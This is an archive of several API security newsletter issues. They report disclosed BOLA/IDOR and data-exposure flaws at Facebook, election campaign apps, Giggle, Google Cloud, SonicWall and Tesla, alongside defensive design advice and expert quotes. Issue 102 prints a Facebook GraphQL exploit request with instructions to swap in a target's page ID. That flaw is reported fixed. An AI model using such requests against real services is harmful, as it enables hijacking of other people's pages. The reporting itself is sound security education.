<p>The post <a href="https://apisecurity.io/issue-102-vulnerabilities-facebook-campaign-apps-creating-defensible-apis/">Issue 102: Vulnerabilities in Facebook and campaign apps, creating defensible APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we look into the recent API vulnerabilities at Facebook and the campaign apps for US presidential election, a new book on the OpenAPI Specification (OAS), and a guest post by API security trainer Mohammed Aldoub on how to build APIs that are easy to defend against attackers.</p>
<h2>Vulnerability: Facebook</h2>
<p>Marcos Ferreira found <a href="https://bugreader.com/marcos@change-the-username-for-any-facebook-page-219" target="_blank" rel="noopener noreferrer">a Broken Object-Level Authorization (BOLA/IDOR) vulnerability in Facebook&#8217;s GraphQL API</a>.  The vulnerability allowed anyone to change the URL of a Facebook Page (so not your Facebook profile or user account), and then take over the old URL.</p>
<p>Facebook allows page admins to create a &#8220;<code>username</code>&#8221; for their page, so that the URL of the page would be more human-readable, instead of using the page ID.</p>
<p>The API for that posts a JSON with the page ID and the &#8220;<code>username</code>&#8221; you want to assign to it:</p>
<p><img decoding="async" src="https://bugreader.com/data/images/5f602018b9f8a1600135192e3a414427af82eb317f5fb48e02dd815298502.PNG" /></p>
<p>The attackers could simply find the page ID of their intended victim and send an API call for creating a username for a Facebook Page using this page ID.</p>
<pre>POST /api/graphql/ HTTP/1.1
Host: facebook.com

fb_api_req_friendly_name=PagesCometAdminEditingUsernameMutation&amp;

doc_id=2886327251450197&amp;

variables={"input":
  {"end_point":"comet_left_nav_bar",
   "entry_point":"comet",
   "<strong>page_id":"0"</strong>,
   "skip_save_for_validation_only":false,
   "<strong>username":"TEST123456"</strong>,
   "actor_id":"0",
   "client_mutation_id":"9"
  }
}</pre>
<p><em>Change <strong>page_id</strong> with your target&#8217;s Page ID</em></p>
<p><em><strong>Response</strong></em></p>
<pre>"data": { 
  "page_edit_username": { 
  "error": null, 
  "username": "<em>TEST123456</em>" 
  } 
}</pre>
<p>As the result, the URL of the existing page gets changed to the username in the API call, leaving the attackers free to use the recently vacated URL on their own Facebook Page.</p>
<p>With social media playing bigger and bigger part in how people get their information, are influenced, and do business the possible gains (including monetary) for attackers could be significant. Fake profiles and pages impersonating as public figures and businesses have long been a problem in Facebook, so this looks like just another way in.</p>
<p>Facebook has since fixed the issue.</p>
<p>The best way to avoid these kind of issues is naturally to make sure that you have object-level authorization in place not letting anyone make changes that they are not supposed to make.</p>
<h2>Vulnerability: US presidential election campaign apps</h2>
<p>The US presidential elections are fast approaching, and campaigning is on the final stretch. In this time and era, there obviously is an app for it. Among more traditional analysts, application security specialists have been looking into the campaigns as well. In neither case did they come away empty-handed.</p>
<p>Researchers behind &#8220;The App Analyst&#8221; blog analyzed the apps for both campaigns and found security issues in both of them. <a href="https://theappanalyst.com/biden.html" target="_blank" rel="noopener noreferrer">The Biden app</a> was more complex in terms of its functions, and had a couple of API security flaws, namely Excessive Data Exposure:</p>
<p>1. JSON object returned for each object contained more data than the user interface exposed &#8211; for example it included projected voting history and date of birth:</p>
<p><img decoding="async" src="https://theappanalyst.com/assets/biden/biden_1.png" /></p>
<p>2. They also had API that the app could make to submit information from user contacts. That API was returning data not used by the app but containing pretty sensitive information including home address:</p>
<p><img decoding="async" src="https://theappanalyst.com/assets/biden/biden_2.png" /></p>
<p>The vulnerabilities were responsibly disclosed and fixed within few days.</p>
<p>Meanwhile, Website Planet discovered that the more basic <a href="https://www.websiteplanet.com/blog/trump-app-vulnerability-report/" target="_blank" rel="noopener noreferrer">Trump app exposed several API keys</a> to different parts of the app in its Android APK file. These keys in turn could have potentially allowed attackers to impersonate the app (for example, Tweet on behalf of the campaign), or even potentially access user data. In this, too, the vulnerabilities were fixed within days of being reported.</p>
<p>Don&#8217;t put your API keys in the app and don&#8217;t expose in your APIs more data than you are OK with users seeing.</p>
<h2>Book: Designing APIs with Swagger and OpenAPI</h2>
<p>Formal, machine-readable API definitions are key to security automation, and OpenAPI (aka Swagger) is by far the dominant standard here.</p>
<p>You can learn more about the standard and its practical use in <a href="https://www.manning.com/books/designing-apis-with-swagger-and-openapi" target="_blank" rel="noopener noreferrer">Josh Ponelat&#8217;s book &#8220;Designing APIs with Swagger and OpenAPI&#8221;</a> (Manning Books).</p>
<p>It&#8217;s a great hands-on primer for describing, planning, and designing web APIs, from planning and tools to developing and documenting your API. The book is still work in progress and if you subscribe, you can get chapters as they get out (and the full book after it&#8217;s done.)</p>
<p>Use the coupon code <code>42Crunch40</code> to get 42% off at the checkout.</p>
<h2>Opinion: Creating defensible APIs</h2>
<p><img loading="lazy" decoding="async" class="alignleft wp-image-7308" src="https://apisecurity.io/wp-content/uploads/2020/09/Bmjm4_2t_400x400.jpg" alt="" width="150" height="150" /></p>
<p><em>The text below was <a href="https://twitter.com/voulnet" target="_blank" rel="noopener noreferrer">Mohammed Aldoub</a>&#8216;s contribution to our 100th newsletter issue. The text was definitely much longer and much more detailed than what the format of that issue could allow, so we decided to put it on its own in one of the later newsletters: this one <img src="https://s.w.org/images/core/emoji/16.0.1/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" /></em></p>
<p><em>Mohammed is a well-known API security trainer known, for example, for his 2-day API security classes at Black Hat conferences (here&#8217;s the link to <a href="https://www.blackhat.com/eu-20/training/schedule/#attacking-and-securing-apis-19751" target="_blank" rel="noopener noreferrer">the next one at Black Hat Europe 2020 in December</a>). Below is a quick summary of the key points that he teaches in his classes. To learn more, we highly recommend joining them.</em></p>
<p>&nbsp;</p>
<p>APIs need to be <strong>easy to use right</strong>, and <strong>hard to use wrong</strong>.</p>
<p>Easy to use securely, and hard to use insecurely.</p>
<p>But how?</p>
<p>Approaches:</p>
<ul>
<li>Secure defaults.</li>
<li>Strict data validation</li>
<li>Adherence to standards/expectations/conventions.</li>
<li>Clear documentation</li>
<li>Logging and Monitoring</li>
</ul>
<h3>Secure defaults</h3>
<p>If you design a feature to be secure by default, you will worry less about API consumers’ levels of experience, trust or interest in security.</p>
<p>Secure defaults provide us with better protections against novice mistakes, incomplete assumptions and rushed deployments.</p>
<p><strong>Examples</strong> of secure defaults:</p>
<ul>
<li>Using default strong password <strong>hashing</strong> and storage methods.</li>
<li><strong>Auto-generated</strong> administration passwords instead of default passwords.</li>
<li><strong>Encoding</strong> all output data by default, unless requested otherwise.</li>
</ul>
<h3>Strict data validation</h3>
<p>Making sure your API only accepts a verified format of input and output data results in more secure APIs.</p>
<p>Examples of strict data validation:</p>
<ul>
<li>Strict <strong>validation</strong> of input data according to one format (JSON or XML)</li>
<li>Strict <strong>declaration</strong> of expected input and output elements, and discard for any unexpected or extra elements.</li>
<li>Conforming data to certain lengths or <strong>content-types</strong>.</li>
<li><strong>Validation</strong> of digital signatures and integrity codes (Hash, Mac)</li>
</ul>
<h3>Adherence to standards/expectations/conventions</h3>
<p>The less assumptions API consumers have to make about your API, the less chances exist for abuse and exploitation. A secure API needs to pull no surprises or weird behavior.</p>
<p>Examples include:</p>
<ul>
<li>Utilizing and respecting HTTP standard features:
<ul>
<li><strong>Never</strong> change state/data on a GET or HEAD request.</li>
<li>Create new resources with POST.</li>
<li><strong>Update</strong> specific resources with PUT or POST.</li>
<li><strong>Respecting</strong> HTTP caching headers.</li>
<li><strong>Proper</strong> data content-types (json, xml, text… etc)</li>
</ul>
</li>
</ul>
<h3>Clear documentation</h3>
<p>If a feature is not very well documented in writing, API users will still document it in their heads (or their internal wikis!) based on what they assume, understand or test.</p>
<p><strong>Where there are assumptions, there are vulnerabilities.</strong></p>
<p>Documentation <strong>must be very clear </strong>on:</p>
<ul>
<li><strong>Unsafe methods </strong>that should only be used in certain circumstances.
<ul>
<li>g. methods that output unvalidated data.</li>
<li>For example: ReactJS&#8217;s <strong>dangerouslySetInnerHTML</strong></li>
</ul>
</li>
<li><strong>Edge cases </strong>that need to be handled or understood by developers.</li>
<li>Errors and <strong>exceptions</strong></li>
</ul>
<h3>Logging and monitoring</h3>
<p>An API needs to have advanced, multi-level logging capabilities and methods.</p>
<p>Suggested Log levels for APIs:</p>
<ul>
<li><strong>Detailed</strong>, for debugging purposes.</li>
<li><strong>Production</strong>, just enough details <strong>but no sensitive info</strong> and redacted PII (Personally Identifiable Information) especially passwords.</li>
<li><strong>Basic</strong>, for statistics, anomaly analysis and business tracking.</li>
</ul>
<p>Logging formats:</p>
<ul>
<li>Cloud provider logs  (e.g. AWS CloudWatch)</li>
<li>Logging provided by language/framework.</li>
<li>Web server logging format.</li>
<li>Some services (CDN, Cloud, WAF) also log in JSON format.</li>
<li>OS level logging (e.g. Windows Event Logs)</li>
</ul>
<p>Logging has very significant security impact, mainly in two ways:</p>
<ul>
<li>Logging Security-related events.</li>
<li>Securing the log data itself.</li>
</ul>
<p>Logs can determine attack sources, attack payloads, exploits used, and also whether or not attacks were successful and data was stolen.</p>
<p>It’s therefore <strong>essential</strong> to <strong>log suspicious </strong>request and responses, and also <strong>essential</strong> to <strong>protect the logs </strong>themselves just as well as we protect the databases.</p>
<p>Solutions to protect logs:</p>
<ul>
<li>Never logging <strong>sensitive</strong> data fully (Passwords …. Etc)</li>
<li>Apply <strong>access controls </strong>to determine who’s allowed to read logs.</li>
<li><strong>Encrypt</strong> logs at rest and transmit, and securely archive old log files.</li>
<li>Periodically <strong>review</strong> what gets logged</li>
<li>Protect <strong>systems that handle log </strong>files: Log aggregation, log analysis and log transmission. E.g. Protect Apache Solr and ElasticSearch &amp; Kibana endpoints.</li>
<li>Also <strong>log access attempts to the logs </strong>themselves! Know who viewed the logs and what for!</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-102-vulnerabilities-facebook-campaign-apps-creating-defensible-apis/">Issue 102: Vulnerabilities in Facebook and campaign apps, creating defensible APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 101: Vulnerabilities in Giggle, Google Cloud Platform, SonicWall, New Relic, Tesla</title>
		<link>https://apisecurity.io/issue-101-vulnerabilities-giggle-google-cloud-platform-sonicwall-new-relic-tesla/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 16 Sep 2020 22:00:07 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7265</guid>

					<description><![CDATA[<p>After the special 100th edition last week, which was all about API security advice from the industry&#8217;s thought leaders, this week we are back to our regular API security news, and we have twice the number of them, from the past two weeks. Vulnerability: Giggle Giggle is a women-only social network and mobile app. It [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-101-vulnerabilities-giggle-google-cloud-platform-sonicwall-new-relic-tesla/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-101-vulnerabilities-giggle-google-cloud-platform-sonicwall-new-relic-tesla/">Issue 101: Vulnerabilities in Giggle, Google Cloud Platform, SonicWall, New Relic, Tesla</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>After the special 100th edition last week, which was all about <a href="https://apisecurity.io/issue-100-api-security-advice-top-industry-experts/" target="_blank" rel="noopener noreferrer">API security advice from the industry&#8217;s thought leaders</a>, this week we are back to our regular API security news, and we have twice the number of them, from the past two weeks.</p>
<h2>Vulnerability: Giggle</h2>
<p>Giggle is a women-only social network and mobile app. It is meant to be a safe place for everyone on the network but, turns out it was not all that safe: <a href="https://research.digitalinterruption.com/2020/09/10/giggle-laughable-security/" target="_blank" rel="noopener noreferrer">researchers from Digital Interruption found some serious API flaws in it</a>.</p>
<p>The team ran the app through a proxy and observed the API traffic. They found that the API behind the app effectively had a query language:</p>
<p><img decoding="async" src="https://research.digitalinterruption.com/assets/img/2020-09-10-giggle-laughable-security/image2.png.resize.png" /></p>
<p>This meant that they could query any user record:</p>
<p><img decoding="async" src="https://research.digitalinterruption.com/assets/img/2020-09-10-giggle-laughable-security/image3.png.resize.png" /></p>
<p>The API returned full user info, even when the queried record was another user (classical <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm" target="_blank" rel="noopener noreferrer">BOLA/IDOR</a>):</p>
<p><img decoding="async" src="https://research.digitalinterruption.com/assets/img/2020-09-10-giggle-laughable-security/image4.png.resize.png" /></p>
<p>As you can see this includes very confidential information, such as name, email, picture, interests, exact geographic location&#8230;</p>
<p>To make things worse, operators in the API filter included <code>contains</code>, which opened up the system for enumeration attacks:</p>
<p><img decoding="async" src="https://research.digitalinterruption.com/assets/img/2020-09-10-giggle-laughable-security/image6.png.resize.png" alt="Burp Web Request" /></p>
<p>So, easily exploitable vulnerability that given the nature of the service could have serious consequences.</p>
<p>Quite a drama seems to have ensued from the attempts to responsibly disclose the vulnerability, but luckily it has now been fixed.</p>
<h2>Vulnerability: Google Cloud Platform</h2>
<p><a href="https://www.ezequiel.tech/2020/08/leaking-google-cloud-projects.html" target="_blank" rel="noopener noreferrer">Ezequiel Pereira found an API flaw in Google Cloud Platform (GCP)</a> that could allow attackers to obtain a list of service accounts in a GCP project and potentially gain access to unsecured resources.</p>
<p>Pereira was looking at the IAM API of GCP and figured out that the page token it used for pagination was a <code>Base64 Protobuf</code>-encoded string that contained his project ID. He could then forge page tokens for GCP projects he did not own and use the tokens to get results which he was not supposed to be able to access.</p>
<p>Pereira then expanded his attack and figured out a way to use GCP services to enumerate unsecured resources or GCP projects that in turn could provide more details on GCP customers, opening door to further, more directed attacks.</p>
<p>The fact that the  authorization check was not working on this API makes this a yet another <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm" target="_blank" rel="noopener noreferrer">BOLA/IDOR vulnerability</a>.</p>
<h2>Vulnerability: SonicWall</h2>
<p>SonicWall provides security appliances, such as firewalls, and API vulnerabilities involving security companies always feel doubly embarrassing. Pen Test Partners found that <a href="https://www.pentestpartners.com/security-blog/cloud-firewall-management-api-snafu-put-500k-sonicwall-customers-at-risk/" target="_blank" rel="noopener noreferrer">SonicWall&#8217;s cloud management platform APIs were susceptible to IDOR/BOLA attacks</a>.</p>
<p>The management platform has a feature that lets you invite other users into your groups and delegate the management of SonicWall network security devices. Behind the scenes, this feature uses the API endpoint <code>api/users/add-user</code>.  The API request takes a parameter <code>partyGroupID</code>, a 7-digit sequential group ID that is unique to your group across all tenants. The user is added to the group with the specified ID. Sounds quite ordinary, right?</p>
<p>Just seven digits <em>and</em> sequential ID means that attackers could simply brute-force the group ID and use it when invoking the endpoint. SonicWall did check the parameter <code>emailAddress</code>, but if the email did not match the JSON WebToken (JWT) used for authorization, the user was still added to the group. In practice, this amounts to not having authorization in place at all. Because the group ID spanned the tenants, the user would be added to the group on <em>all</em> tenants.</p>
<p>All this could have allowed attackers to add themselves to any of the about 2 million groups in 500 000 organizations, giving them the ability to manipulate 10 million security devices any way they wished!</p>
<p>The vulnerability was eventually fixed, but it is unclear to what extent it has been exploited. Potential harm here is significant.</p>
<h2>Vulnerability: New Relic</h2>
<p><a href="https://hackerone.com/jon_bottarini?type=user" target="_blank" rel="noopener noreferrer">Jon Bottarini has disclosed about 30 (!) vulnerabilites in New Relic</a>, a company specializing in cloud-based software that helps owners of websites and apps track the performance of their services.</p>
<p>A lot of the vulnerabilities are in New Relic APIs, and many are familiar faces:</p>
<ul>
<li>Broken Object Level Authorization (BOLA/IDOR)</li>
<li>Excessive Data Exposure</li>
<li>Broken Function Level Authorization</li>
</ul>
<p>The link takes you to the actual HackerOne reports, so they include the detailed steps to reproduce the issue as well as the discussion threads with the vendor. This means they provide the full context and can serve as good examples for other penetration testers.</p>
<h2>Vulnerability: Tesla</h2>
<p>This vulnerability dates back all the way to 2017, but only got publicly disclosed now: how <a href="https://electrek.co/2020/08/27/tesla-hack-control-over-entire-fleet/" target="_blank" rel="noopener noreferrer">Jason Hughes managed to VPN into Tesla&#8217;s network on from his car and take over their main backend server</a>.</p>
<p>This server controlled the whole Tesla fleet. Hughes discovered an unprotected API he could invoke for any car. All that he needed for that were the last six digits of the car VIN, and the control over the backend server handily provided him that information. He could then get the car&#8217;s location, status, start the car, and even make it move.</p>
<p>Click <a href="https://docs.google.com/document/d/1yXni1GoD93q8mX-yom7JLBn0Q8tPOQz2A_y3m3LJi8o/edit" target="_blank" rel="noopener noreferrer">here</a> to read the full report.</p>
<p>Lesson learned: no such thing as internal API exists these days. Even API on internal network should be protected.</p>
<p>On the topic of high-end smart cars, <a href="https://apisecurity.io/issue-99-api-flaws-mercedes-benz-app-russian-inter-bank-money-transfer/" target="_blank" rel="noopener noreferrer">we recently also covered a similar vulnerability with Mercedes-Benz</a>.</p>
<h2>Cheatsheet: Finding IDOR</h2>
<p>Broken Object-Level Authorization (aka BOLA or IDOR) <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm" target="_blank" rel="noopener noreferrer">is the number one and the most common issue in the OWASP API Security Top 10 list</a>. Even just in this newsletter, all but one of our vulnerabilities directly involved BOLA!</p>
<p>Dohn Joe has put together <a href="https://www.notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b" target="_blank" rel="noopener noreferrer">a neat quick cheatsheet on how to find IDOR/BOLA on APIs</a>.</p>
<p>Worth a read for all pentesters out there!</p>
<h2>Webinar: &#8220;OAuth, OWASP, Gateways and Meshes &#8211; Oh my!&#8221;</h2>
<p>On next Thursday, September 24, Keith Casey (OKTA), David Stewart (CriticalBlue), and Isabelle Mauny (42Crunch) <a href="https://us02web.zoom.us/webinar/register/WN_YvcIjmzxTn-ulyMJWgHu5w" target="_blank" rel="noopener noreferrer">are hosting a webinar on the layers and alternatives in the confusing world of API security</a>. Quoting from the webinar abstract:</p>
<blockquote><p><em>This webinar was born from a chat around a coffee at a conference, when we discovered we all spent a lot of time explaining the paths towards better API security to customers. OAuth, OWASP, OIDC, SCA, IDPs, RPs, North-South, East-West, Meshes: welcome to the alphabet soup of API Security where there are no maps, lots of obstacles and detours, and threats from all sides.</em></p>
<p><em>Do you feel a bit lost? You are not alone.</em></p>
<p><em>To consider and apply API security effectively, we need to understand where we are and where we need to go. We need to know the tools we have available and who our allies are. Finally, we need a clear path and priorities on what we can accomplish and how. In this webinar, we’ll lay out a reference architecture to ensure we understand the scope, challenges, and approach to secure your APIs and organization as a whole.</em></p>
<p><em>We will use real use cases to illustrate the various threats and abuse APIs are exposed to.</em></p>
<p><em>Topics for discussion:</em><br />
<em>&#8211; What’s the landscape? What is in bounds vs out of bounds?</em><br />
<em>&#8211; What are the most common obstacles? How can we overcome them?</em><br />
<em>&#8211; Where have others failed before us? How can we avoid the same?</em></p></blockquote>
<p>Click <a href="https://us02web.zoom.us/webinar/register/WN_YvcIjmzxTn-ulyMJWgHu5w" target="_blank" rel="noopener noreferrer">here</a> to enroll and reserve your spot.</p>
<p><a href="https://us02web.zoom.us/webinar/register/WN_YvcIjmzxTn-ulyMJWgHu5w" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="size-full wp-image-7267 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/09/Webinar-on-the-layers-of-API-security.jpg" alt="" width="600" height="338" /></a></p>
<h2>Conference: DevOps World</h2>
<p>If you are using Jenkins, make sure to attend next week&#8217;s virtual DevOps World conference on September 22—24.</p>
<p>This is a free event offering a whopping 57 security-related sessions, including one specifically on APIs: <a href="https://sessions.devopsworld.com/sessions?p1=eyJzcGVha2VyIjpbXSwidGltZXNsb3QiOltdLCJkYXkiOltdLCJyb29tIjpbXSwibG9jYXRpb24iOltdLCJzdGFydCI6IiIsImZpbmlzaCI6IiIsInBhZ2VudW1iZXIiOjEsImNhdGVnb3JpZXMiOnt9LCJrZXl3b3JkIjoic290bmlrb3YifQ%3D%3D" target="_blank" rel="noopener noreferrer">&#8220;Using Jenkins Pipeline and DevSecOps for API Security&#8221;</a>, presented by yours truly.</p>
<p><a href="https://sessions.devopsworld.com/sessions?p1=eyJzcGVha2VyIjpbXSwidGltZXNsb3QiOltdLCJkYXkiOltdLCJyb29tIjpbXSwibG9jYXRpb24iOltdLCJzdGFydCI6IiIsImZpbmlzaCI6IiIsInBhZ2VudW1iZXIiOjEsImNhdGVnb3JpZXMiOnt9LCJrZXl3b3JkIjoic290bmlrb3YifQ%3D%3D" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="size-full wp-image-7266 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/09/DevOps-World-Jenkins-pipeline-for-REST-API-DevSecOps-Dmitry-Sotnikov.jpg" alt="" width="600" height="314" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-101-vulnerabilities-giggle-google-cloud-platform-sonicwall-new-relic-tesla/">Issue 101: Vulnerabilities in Giggle, Google Cloud Platform, SonicWall, New Relic, Tesla</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 100: API Security advice from top industry experts</title>
		<link>https://apisecurity.io/issue-100-api-security-advice-top-industry-experts/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 09 Sep 2020 22:00:33 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7231</guid>

					<description><![CDATA[<p>Today is a special day for our newsletter &#8211; our centennial issue and the number of email subscribers crossing the 5,000 mark (and in addition to that we have about 1300 followers on Twitter and a similar number of members of the API Security LinkedIn group). This has definitely grown significantly bigger than the original [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-100-api-security-advice-top-industry-experts/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-100-api-security-advice-top-industry-experts/">Issue 100: API Security advice from top industry experts</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Today is a special day for our newsletter &#8211; our centennial issue and the number of email subscribers crossing the 5,000 mark (and in addition to that we have about <a href="https://twitter.com/apisecurityio" target="_blank" rel="noopener noreferrer">1300 followers on Twitter</a> and a similar number of members of the <a href="https://www.linkedin.com/groups/12148519/" target="_blank" rel="noopener noreferrer">API Security LinkedIn group</a>).</p>
<p>This has definitely grown significantly bigger than the original side-project to share with the community the news, updates, and experience that we saw at <a href="https://42crunch.com/" target="_blank" rel="noopener noreferrer">42Crunch</a> in the field.</p>
<p>To celebrate, we decided to make this issue special.</p>
<ul>
<li>We reached out to some of our most prominent readers and followers asking them to share their favorite API Security advice (see below!)</li>
<li>And we will be giving out extremely cool Nano Leaf smart lighting system to one of our readers sharing this newsletter in social media (see the rules at the end of this newsletter.)</li>
</ul>
<h2>Industry Thought Leaders on API Security</h2>
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-7239" src="https://apisecurity.io/wp-content/uploads/2020/09/mike-isbitski.jpg" alt="" width="150" height="150" /></p>
<p><a href="https://www.linkedin.com/in/michael-isbitski-45728737/" target="_blank" rel="noopener noreferrer"><strong>Michael Isbitski</strong></a><br />
Senior Director Analyst, Gartner</p>
<p>&#8220;Organizations create and expose APIs to enable automation, system integration, business functionality and data access. An unfortunate side effect of this is that it creates new opportunities for attackers. As a result, API security has become a significant focus area for organizations of all sizes, across verticals and sectors. Traditional security strategies focused heavily on network security and access controls, with encrypted transport, VPNs and API gateways featured prominently. These are pieces of a much larger puzzle of API security strategy.</p>
<p>Certainly, encrypt data in transit using TLS 1.2 or better, and enforce proper access control (where possible) so that only authenticated, authorized parties consume your APIs. However, you should also consider how your APIs may be exploited or abused. An API may be designed with quality, hardened code, only to find that it is susceptible to attacks such as brute forcing, account takeover and scraping. Appropriate countermeasures for business logic and automated attacks that target APIs are often not achievable with code-only approaches or static rate limits offered by most gateways. A common set of best practices includes security testing your APIs, implementing traffic management controls and mediating access to APIs with API management and API gateways. It also includes augmenting with technologies such as web application firewalls, bot mitigation or dedicated API security mechanisms to address newer patterns of attack.&#8221;</p>
<p>&nbsp;</p>
<hr />
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-7238" src="https://apisecurity.io/wp-content/uploads/2020/09/doug-cahill_150.jpg" alt="" width="150" height="150" /></p>
<p><a href="https://www.esg-global.com/analysts/doug-cahill" target="_blank" rel="noopener noreferrer"><strong>Doug Cahill</strong></a><br />
Vice President and Group Director, Cybersecurity, Enterprise Strategy Group</p>
<p>&#8220;The pressure on project teams to write and push more code to production at an accelerated pace has been a central feature of the API economy as well as an opportunity for cyber adversaries. As such, the broad use of APIs by development teams has made API security an essential facet of a cybersecurity program.</p>
<p>According to research conducted by ESG, while 44% of organizations have already invested in formal API security training, another 43% are still learning. Those learnings must start with an understanding of the API threat model including how, for example, misconfigured API usage creates a risk of data loss.</p>
<p>Purposeful API security controls are also required to protect the dev-time and runtime use of APIs. Over half of the organizations who participated in ESG’s research are already employing specialty API security controls with 38% more planning to do so in the next 12 months. ESG’s research indicates the maturation of API security initiatives are well underway, but sustained focus is required.&#8221;</p>
<hr />
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-7247" src="https://apisecurity.io/wp-content/uploads/2020/09/alexi.jpg" alt="" width="150" height="150" /></p>
<p><a href="https://www.kuppingercole.com/team/balaganski" target="_blank" rel="noopener noreferrer"><strong>Alexei Balaganski</strong></a><br />
Lead Analyst, KuppingerCole Analysts AG</p>
<p>&#8220;In just over a decade, APIs have evolved from an obscure technical term for developers to the literate backbone of the Digital Transformation and a major source of income for modern businesses. In a world where digital information is one of the “crown jewels” of many modern businesses, APIs are now powering the logistics of delivering digital products to partners and customers. In short, everyone needs APIs! Creating a REST API is very easy; unfortunately, creating a reliable and secure API is nowhere near as simple. Numerous reports about API-related data breaches clearly indicate that many companies still lack even basic competence in the field and tend to be overconfident about their existing security tools.</p>
<p>Securing APIs is complicated but following a few basic rules can bring you a long way. First, no API should be left behind: public or private, own or 3rd party – all APIs must be accounted for and brought under consistent monitoring and governance. Second, security must be integrated into every phase of the API lifecycle: from its initial design to development, operations, and eventual retirement. Finally, do not try to reinvent the wheel: refer to established frameworks like OWASP API Security Top 10 and best practices and guidance from reputable vendors.</p>
<p>However, the biggest challenge of API security is still raising public awareness of potential API risks and new tools that exist to mitigate them. <a href="https://apisecurity.io/" target="_blank" rel="noopener noreferrer">This newsletter</a> is actually a great resource for both amateurs and professionals!&#8221;</p>
<p>&nbsp;</p>
<hr />
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-7240" src="https://apisecurity.io/wp-content/uploads/2020/09/rik-turner.jpg" alt="" width="150" height="150" /></p>
<p><a href="https://www.omdia.com/analysts-and-events/meet-the-team/rik-turner" target="_blank" rel="noopener noreferrer"><strong>Rik Turner</strong></a><br />
Principal Analyst, Infrastructure Solutions, Omdia</p>
<p>&#8220;API security is nowadays an essential part of the armory of any organization, commercial or not, that interacts with communities (customers, partners, patients, constituents or citizens) via a Web and/or mobile app. App-to-app, system-to-system, and machine-to-machine communications have overtaken those directly involving humans, in terms of the volume of traffic they generate, and guaranteeing that APIs calls are legitimate, i.e. coming from a recognized source and asking for appropriate data etc, is a key capability. Omdia talks about Next-Generation Application Security, which includes capabilities, on the runtime side of things, like DDoS mitigation, WAF, bot management and API security. There is also an increasing role for this technology in the development pipeline, making sure that an API is correctly written and configured before it goes into production. With all this going on, it is no surprise to me that APIsecurity.io has reached its 100th issue, nor that it has over 5,000 subscribers. I salute the endeavour and look forward to reading many more editions!&#8221;</p>
<p>&nbsp;</p>
<hr />
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-7242" src="https://apisecurity.io/wp-content/uploads/2020/09/kin-lane.jpg" alt="" width="150" height="150" /></p>
<p><a href="https://apievangelist.com/" target="_blank" rel="noopener noreferrer"><strong>Kin Lane</strong></a><br />
API Evangelist</p>
<p>&#8220;When it comes to API security, the most important thing you can do is know where all of your APIs are&#8211;as you can&#8217;t secure what you don&#8217;t know about. Beyond that, treat ALL YOUR APIs like they are public APIs, because if you are using public DNS for accessing your APIs, you have public APIs! Then all you have to do is read <a href="https://apisecurity.io/" target="_blank" rel="noopener noreferrer">APIsecurity.io</a> and you are good to go!! ;-)&#8221;</p>
<p>&nbsp;</p>
<hr />
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-7243" src="https://apisecurity.io/wp-content/uploads/2020/09/alissa-knight.jpg" alt="" width="150" height="150" /></p>
<p><a href="https://www.alissaknight.com/" target="_blank" rel="noopener noreferrer"><strong>Alissa Knight</strong></a><br />
Cybersecurity Influencer, Content Creator, Hacker, Published Author, Partner at Knight Ink</p>
<p>“Every single one of the successful API penetration tests I’ve done in the financial services market over the past year have suffered from some form of broken object level authorization vulnerability. This is clearly a growing problem that organizations are not testing for. If I can offer any advice at all in hardening APIs, it would be to test for BOLA vulnerabilities. In my findings, they are becoming all too systemic and have allowed me to transfer money between accounts I don’t own or make changes to account authentication parameters.”</p>
<p>&nbsp;</p>
<hr />
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-7248" src="https://apisecurity.io/wp-content/uploads/2020/09/philippe.jpg" alt="" width="150" height="150" /></p>
<p><a href="https://pragmaticwebsecurity.com/" target="_blank" rel="noopener noreferrer"><strong>Philippe De Ryck</strong></a><br />
Founder, Pragmatic Web Security</p>
<p>&#8220;API security is challenging because it is so easy to get distracted by the shiny exterior. API security is not about responsive Single Page Applications or beautifully designed mobile apps. API security is not about user features offered by client applications. API security is not about the rules enforced by the client. Instead, API security is about raw requests and responses, arbitrary JSON and XML data structures, and data. Lots of data. Untrusted data. Sensitive data.</p>
